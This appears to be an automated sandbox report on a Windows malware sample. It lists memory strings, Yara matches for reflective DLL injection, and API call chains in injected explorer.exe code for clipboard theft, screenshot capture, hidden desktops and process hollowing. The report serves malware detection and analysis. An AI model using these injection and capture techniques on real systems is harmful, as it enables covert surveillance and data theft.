Source: A91B.tmp.zx.exe, 0000000B.00000002.1932658206.000002492B207000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 0000000B.00000003.1928152495.000002492B1D4000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 0000000B.00000003.1930611252.000002492B205000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 0000000B.00000003.1927536905.000002492B170000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
Source: explorer.exe, 00000002.00000002.2969120001.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1738931822.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
Source: explorer.exe, 00000002.00000002.2969120001.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1738931822.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
Source: explorer.exe, 00000002.00000002.2969120001.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1738931822.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
Source: explorer.exe, 00000002.00000002.2969120001.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1738931822.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
Source: explorer.exe, 00000002.00000002.2969120001.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1738931822.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
Source: explorer.exe, 00000002.00000002.2969120001.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1738931822.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
Source: explorer.exe, 00000002.00000002.2969120001.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1738931822.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
Source: svchost.exe, 00000001.00000003.1710887914.000001F42FC23000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEY
Source: svchost.exe, 00000001.00000003.1710887914.000001F42FC23000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: explorer.exe, 00000002.00000003.2044663166.000000000C5E4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1744073226.000000000C5E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2979823330.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://outlook.com_
Source: explorer.exe, 00000002.00000003.2044663166.000000000C5E4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1744073226.000000000C5E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2979823330.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://powerpoint.office.comcember
Source: explorer.exe, 00000002.00000002.2969120001.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1738931822.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
Source: explorer.exe, 00000002.00000002.2969120001.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1738931822.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000002.00000002.2969120001.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1738931822.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000002.00000002.2979823330.000000000C557000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1744073226.000000000C557000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://wns.windows.com/L
Source: explorer.exe, 00000002.00000003.2044663166.000000000C5E4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1744073226.000000000C5E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2979823330.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://word.office.com
Source: svchost.exe, 00000001.00000003.1710887914.000001F42FC23000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94
Source: A91B.tmp.zx.exe, 00000008.00000003.1916809501.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1916809501.0000029904E09000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1913447880.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1915552645.0000029904E0C000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1900343813.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1915552645.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1910753387.0000029904E0C000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1910753387.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1899474816.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1899277559.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1912593435.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1899760404.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, A91B.tmp.zx.exe, 00000008.00000003.1899945578.0000029904DFF000.00000004.00000020.00020000.00000000.sdmp, _socket.pyd.8.dr, libffi-7.dll.8.dr, python38.dll.8.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: svchost.exe, 00000001.00000003.1710887914.000001F42FC23000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: explorer.exe, 00000002.00000002.2969120001.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1738931822.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
Source: explorer.exe, 00000002.00000002.2969120001.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1738931822.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
Source: explorer.exe, 00000002.00000002.2969120001.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2969120001.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1738931822.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1738931822.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
Source: explorer.exe, 00000002.00000002.2969120001.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1738931822.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
Source: explorer.exe, 00000002.00000002.2969120001.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1738931822.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
Source: explorer.exe, 00000002.00000002.2969120001.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1738931822.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
Source: explorer.exe, 00000002.00000002.2969120001.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1738931822.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
Source: explorer.exe, 00000002.00000002.2969120001.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1738931822.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
Source: explorer.exe, 00000002.00000002.2969120001.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1738931822.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
Source: explorer.exe, 00000002.00000000.1738931822.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
Source: explorer.exe, 00000002.00000002.2969120001.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1738931822.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
Source: explorer.exe, 00000002.00000002.2969120001.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1738931822.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
Source: explorer.exe, 00000002.00000002.2969120001.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1738931822.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
Source: explorer.exe, 00000002.00000002.2969120001.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1738931822.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com:443/en-us/feed
Source: explorer.exe, 00000002.00000002.2969120001.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1738931822.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
Source: explorer.exe, 00000002.00000002.2969120001.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1738931822.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe

Source: C:\Windows\explorer.exe

Code function: 2_2_0FC15E54 OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

Contains functionality to modify clipboard data

Source: C:\Windows\explorer.exe	Code function: 2_2_0FC16050 GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,		2_2_0FC16050
Source: C:\Windows\explorer.exe	Code function: 2_2_0FC44078 SetClipboardData,		2_2_0FC44078

Contains functionality to read the clipboard data

Source: C:\Windows\explorer.exe

Code function: 2_2_0FC15E54 OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

Contains functionality to record screenshots

Source: C:\Windows\explorer.exe

Code function: 2_2_0FC19950 GetDesktopWindow,GetWindowRect,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,CreateCompatibleBitmap,CreateCompatibleDC,SelectObject,SetStretchBltMode,StretchBlt,DeleteObject,DeleteDC,free,free,free,malloc,malloc,malloc,GetDIBits,DeleteObject,ReleaseDC,DeleteDC,memcpy,memcpy,

2_2_0FC19950

Source: C:\Windows\explorer.exe

Code function: 2_2_0FC1A4A8 memset,memset,OpenDesktopA,CreateDesktopA,SetThreadDesktop,CreateThread,WaitForSingleObject,free,free,free,CloseHandle,CloseHandle,

2_2_0FC1A4A8

System Summary

Malicious sample detected (through community Yara rule)

Source: 2.0.explorer.exe.7da0000.1.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 2.0.explorer.exe.7da0000.1.raw.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 2.2.explorer.exe.9cb0000.3.raw.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 2.2.explorer.exe.c350000.8.raw.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 2.2.explorer.exe.7da0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 2.2.explorer.exe.fc00000.9.raw.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 2.2.explorer.exe.9cb0000.3.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 2.2.explorer.exe.7da0000.0.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 2.2.explorer.exe.fc00000.9.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 2.2.explorer.exe.c350000.8.unpack, type: UNPACKEDPE	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 00000002.00000002.2976185947.0000000009CB0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 00000002.00000002.2971350859.0000000007DA0000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 00000002.00000002.2979697465.000000000C350000.00000020.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 00000002.00000002.2983380179.000000000FC00000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
Source: 00000002.00000000.1739477441.0000000007DA0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen

Abnormal high CPU Usage

Source: C:\Windows\System32\svchost.exe

Process Stats: CPU usage > 49%

Contains functionality to call native functions

Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Code function: 0_2_00007FF6E1701AA4 GetTempPathW,GetTempFileNameW,RtlInitUnicodeString,NtOpenFile,NtSetInformationFile,NtWriteFile,GetLastError,	0_2_00007FF6E1701AA4
Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Code function: 0_2_00007FF6E1701DF4 wcsnlen,GetModuleHandleA,GetProcAddress,lstrcatW,CreateProcessInternalW,NtMapViewOfSection,ResumeThread,	0_2_00007FF6E1701DF4
Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Code function: 0_2_00007FF6E1701D08 NtCreateSection,GetFileSize,SetFilePointer,WriteFile,SetFilePointer,NtClose,	0_2_00007FF6E1701D08
Source: C:\Windows\explorer.exe	Code function: 2_2_09CBE948 CreateFileA,GetFileSize,malloc,ReadFile,CloseHandle,CreateProcessA,GetThreadContext,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,NtQueryInformationProcess,WriteProcessMemory,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,free,	2_2_09CBE948
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Code function: 3_2_00007FF699AB1AA4 GetTempPathW,GetTempFileNameW,RtlInitUnicodeString,NtOpenFile,NtSetInformationFile,NtWriteFile,GetLastError,	3_2_00007FF699AB1AA4
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Code function: 3_2_00007FF699AB1DF4 wcsnlen,GetModuleHandleA,GetProcAddress,lstrcatW,CreateProcessInternalW,NtMapViewOfSection,ResumeThread,	3_2_00007FF699AB1DF4
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Code function: 3_2_00007FF699AB1D08 NtCreateSection,GetFileSize,SetFilePointer,WriteFile,SetFilePointer,NtClose,	3_2_00007FF699AB1D08

Detected potential crypto function

Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Code function: 0_2_00007FF6E1701AA4	0_2_00007FF6E1701AA4
Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Code function: 0_2_00007FF6E170554C	0_2_00007FF6E170554C
Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Code function: 0_2_00007FF6E1701DF4	0_2_00007FF6E1701DF4
Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Code function: 0_2_00007FF6E171B2DC	0_2_00007FF6E171B2DC
Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Code function: 0_2_00007FF6E171E678	0_2_00007FF6E171E678
Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Code function: 0_2_00007FF6E1711690	0_2_00007FF6E1711690
Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Code function: 0_2_00007FF6E1714DC4	0_2_00007FF6E1714DC4
Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Code function: 0_2_00007FF6E171920C	0_2_00007FF6E171920C
Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Code function: 0_2_00007FF6E1716D54	0_2_00007FF6E1716D54
Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Code function: 0_2_00007FF6E17169A4	0_2_00007FF6E17169A4
Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Code function: 0_2_00007FF6E17130F4	0_2_00007FF6E17130F4
Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Code function: 0_2_00007FF6E1711928	0_2_00007FF6E1711928
Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Code function: 0_2_00007FF6E1705D34	0_2_00007FF6E1705D34
Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Code function: 0_2_00007FF6E1719830	0_2_00007FF6E1719830
Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Code function: 0_2_00007FF6E170D834	0_2_00007FF6E170D834
Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Code function: 0_2_00007FF6E1713744	0_2_00007FF6E1713744
Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Code function: 0_2_00007FF6E171D358	0_2_00007FF6E171D358
Source: C:\Users\user\Desktop\fNzx1wx8tL.exe	Code function: 0_2_00007FF6E171DBAC	0_2_00007FF6E171DBAC
Source: C:\Windows\explorer.exe	Code function: 2_2_07DAC698	2_2_07DAC698
Source: C:\Windows\explorer.exe	Code function: 2_2_07DA4F70	2_2_07DA4F70
Source: C:\Windows\explorer.exe	Code function: 2_2_07DAAEF0	2_2_07DAAEF0
Source: C:\Windows\explorer.exe	Code function: 2_2_07DACE2C	2_2_07DACE2C
Source: C:\Windows\explorer.exe	Code function: 2_2_07DA15B0	2_2_07DA15B0
Source: C:\Windows\explorer.exe	Code function: 2_2_07DA2380	2_2_07DA2380
Source: C:\Windows\explorer.exe	Code function: 2_2_09CB21B0	2_2_09CB21B0
Source: C:\Windows\explorer.exe	Code function: 2_2_09CBDA2C	2_2_09CBDA2C
Source: C:\Windows\explorer.exe	Code function: 2_2_09CB5B70	2_2_09CB5B70
Source: C:\Windows\explorer.exe	Code function: 2_2_09CBBAF0	2_2_09CBBAF0
Source: C:\Windows\explorer.exe	Code function: 2_2_09CBD298	2_2_09CBD298
Source: C:\Windows\explorer.exe	Code function: 2_2_09CB2F80	2_2_09CB2F80
Source: C:\Windows\explorer.exe	Code function: 2_2_0C36A280	2_2_0C36A280
Source: C:\Windows\explorer.exe	Code function: 2_2_0C37A490	2_2_0C37A490
Source: C:\Windows\explorer.exe	Code function: 2_2_0C369CF8	2_2_0C369CF8
Source: C:\Windows\explorer.exe	Code function: 2_2_0C37B4C0	2_2_0C37B4C0
Source: C:\Windows\explorer.exe	Code function: 2_2_0C371E48	2_2_0C371E48
Source: C:\Windows\explorer.exe	Code function: 2_2_0C37EF84	2_2_0C37EF84
Source: C:\Windows\explorer.exe	Code function: 2_2_0C36F7E0	2_2_0C36F7E0
Source: C:\Windows\explorer.exe	Code function: 2_2_0C3540B0	2_2_0C3540B0
Source: C:\Windows\explorer.exe	Code function: 2_2_0C36909C	2_2_0C36909C
Source: C:\Windows\explorer.exe	Code function: 2_2_0C3738EC	2_2_0C3738EC
Source: C:\Windows\explorer.exe	Code function: 2_2_0C36F168	2_2_0C36F168
Source: C:\Windows\explorer.exe	Code function: 2_2_0C354990	2_2_0C354990
Source: C:\Windows\explorer.exe	Code function: 2_2_0C3721F8	2_2_0C3721F8
Source: C:\Windows\explorer.exe	Code function: 2_2_0C37F9CB	2_2_0C37F9CB
Source: C:\Windows\explorer.exe	Code function: 2_2_0C37AAB4	2_2_0C37AAB4
Source: C:\Windows\explorer.exe	Code function: 2_2_0C369AFC	2_2_0C369AFC
Source: C:\Windows\explorer.exe	Code function: 2_2_0C374B24	2_2_0C374B24
Source: C:\Windows\explorer.exe	Code function: 2_2_0C37CB6C	2_2_0C37CB6C
Source: C:\Windows\explorer.exe	Code function: 2_2_0C373B84	2_2_0C373B84
Source: C:\Windows\explorer.exe	Code function: 2_2_0C37D3C0	2_2_0C37D3C0
Source: C:\Windows\explorer.exe	Code function: 2_2_0FC04CB0	2_2_0FC04CB0
Source: C:\Windows\explorer.exe	Code function: 2_2_0FC2DFC0	2_2_0FC2DFC0
Source: C:\Windows\explorer.exe	Code function: 2_2_0FC1AE80	2_2_0FC1AE80
Source: C:\Windows\explorer.exe	Code function: 2_2_0FC22DF8	2_2_0FC22DF8
Source: C:\Windows\explorer.exe	Code function: 2_2_0FC1FD68	2_2_0FC1FD68
Source: C:\Windows\explorer.exe	Code function: 2_2_0FC19C9C	2_2_0FC19C9C
Source: C:\Windows\explorer.exe	Code function: 2_2_0FC2FB84	2_2_0FC2FB84
Source: C:\Windows\explorer.exe	Code function: 2_2_0FC22A48	2_2_0FC22A48
Source: C:\Windows\explorer.exe	Code function: 2_2_0FC1A8F8	2_2_0FC1A8F8
Source: C:\Windows\explorer.exe	Code function: 2_2_0FC24784	2_2_0FC24784
Source: C:\Windows\explorer.exe	Code function: 2_2_0FC2D76C	2_2_0FC2D76C
Source: C:\Windows\explorer.exe	Code function: 2_2_0FC25724	2_2_0FC25724
Source: C:\Windows\explorer.exe	Code function: 2_2_0FC1A6FC	2_2_0FC1A6FC
Source: C:\Windows\explorer.exe	Code function: 2_2_0FC2B6B4	2_2_0FC2B6B4
Source: C:\Windows\explorer.exe	Code function: 2_2_0FC305CB	2_2_0FC305CB
Source: C:\Windows\explorer.exe	Code function: 2_2_0FC05590	2_2_0FC05590
Source: C:\Windows\explorer.exe	Code function: 2_2_0FC244EC	2_2_0FC244EC
Source: C:\Windows\explorer.exe	Code function: 2_2_0FC203E0	2_2_0FC203E0
Source: C:\Windows\explorer.exe	Code function: 2_2_0FC2C0C0	2_2_0FC2C0C0
Source: C:\Windows\explorer.exe	Code function: 2_2_0FC2B090	2_2_0FC2B090
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Code function: 3_2_00007FF699AB1AA4	3_2_00007FF699AB1AA4
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Code function: 3_2_00007FF699AB1DF4	3_2_00007FF699AB1DF4
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Code function: 3_2_00007FF699AB554C	3_2_00007FF699AB554C
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Code function: 3_2_00007FF699ACB2DC	3_2_00007FF699ACB2DC
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Code function: 3_2_00007FF699AC1690	3_2_00007FF699AC1690
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Code function: 3_2_00007FF699ACE678	3_2_00007FF699ACE678
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Code function: 3_2_00007FF699AC4DC4	3_2_00007FF699AC4DC4
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Code function: 3_2_00007FF699AC920C	3_2_00007FF699AC920C
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Code function: 3_2_00007FF699AC6D54	3_2_00007FF699AC6D54
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Code function: 3_2_00007FF699AC69A4	3_2_00007FF699AC69A4
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Code function: 3_2_00007FF699AC30F4	3_2_00007FF699AC30F4
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Code function: 3_2_00007FF699AB5D34	3_2_00007FF699AB5D34
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Code function: 3_2_00007FF699AC1928	3_2_00007FF699AC1928
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Code function: 3_2_00007FF699ABD834	3_2_00007FF699ABD834
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Code function: 3_2_00007FF699AC9830	3_2_00007FF699AC9830
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Code function: 3_2_00007FF699ACD358	3_2_00007FF699ACD358
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Code function: 3_2_00007FF699AC3744	3_2_00007FF699AC3744
Source: C:\Users\user\AppData\Roaming\8711E746C94A2518020777\8711E746C94A2518020777.exe	Code function: 3_2_00007FF699ACDBAC	3_2_00007FF699ACDBAC
Source: C:\Windows\System32\svchost.exe	Code function: 4_2_00007FF7536FD834	4_2_00007FF7536FD834
Source: C:\Windows\System32\svchost.exe	Code function: 4_2_00007FF753709830	4_2_00007FF753709830
Source: C:\Windows\System32\svchost.exe	Code function: 4_2_00007FF7537030F4	4_2_00007FF7537030F4
Source: C:\Windows\System32\svchost.exe	Code function: 4_2_00007FF75370DBAC	4_2_00007FF75370DBAC
Source: C:\Windows\System32\svchost.exe	Code function: 4_2_00007FF753703744	4_2_00007FF753703744
Source: C:\Windows\System32\svchost.exe	Code function: 4_2_00007FF75370D358	4_2_00007FF75370D358
Source: C:\Windows\System32\svchost.exe	Code function: 4_2_00007FF753701690	4_2_00007FF753701690
Source: C:\Windows\System32\svchost.exe	Code function: 4_2_00007FF75370B2DC	4_2_00007FF75370B2DC
Source: C:\Windows\System32\svchost.exe	Code function: 4_2_00007FF75370E678	4_2_00007FF75370E678
Source: C:\Windows\System32\svchost.exe	Code function: 4_2_00007FF7536F1AA4	4_2_00007FF7536F1AA4
Source: C:\Windows\System32\svchost.exe	Code function: 4_2_00007FF753706D54	4_2_00007FF753706D54
Source: C:\Windows\System32\svchost.exe	Code function: 4_2_00007FF7536F554C	4_2_00007FF7536F554C
Source: C:\Windows\System32\svchost.exe	Code function: 4_2_00007FF7536F5D34	4_2_00007FF7536F5D34
Source: C:\Windows\System32\svchost.exe	Code function: 4_2_00007FF753701928	4_2_00007FF753701928
Source: C:\Windows\System32\svchost.exe	Code function: 4_2_00007FF75370920C	4_2_00007FF75370920C
Source: C:\Windows\System32\svchost.exe	Code function: 4_2_00007FF7536F1DF4	4_2_00007FF7536F1DF4
Source: C:\Windows\System32\svchost.exe	Code function: 4_2_00007FF753704DC4	4_2_00007FF753704DC4
